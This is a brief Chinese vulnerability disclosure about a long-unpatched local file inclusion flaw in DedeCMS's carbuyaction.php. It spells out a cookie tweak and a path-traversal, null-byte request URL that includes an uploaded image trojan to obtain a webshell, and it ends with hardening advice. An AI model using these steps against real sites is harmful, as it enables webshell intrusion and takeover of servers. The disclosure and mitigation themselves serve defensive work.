DedeCMS漏洞文件之carbuyaction.php,这个漏洞长达几年,跨了几个版本,网上也公开过了,DedeCMS就是不修复,可以直接导致拿shell
详细说明:漏洞文件carbuyaction.php
本地试了一下,最新DedeCMS版本一样可行。 首先利用cookie修改工具,加上 code=alipay 然后访问 http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00 直接包含成功 利用条件为GPC OFF ,或者某些环境下的截断。 可以在会员中心里上传个图片木马进行拿shell。 还可以包含dede自身文件进行更多利用,这里就不详细了。 |
漏洞证明:更新最新版本,覆盖同名文件,然后做好目录读写执行权限(《织梦DedeCms V5.5/V5.6/v5.7等安全设置指南》)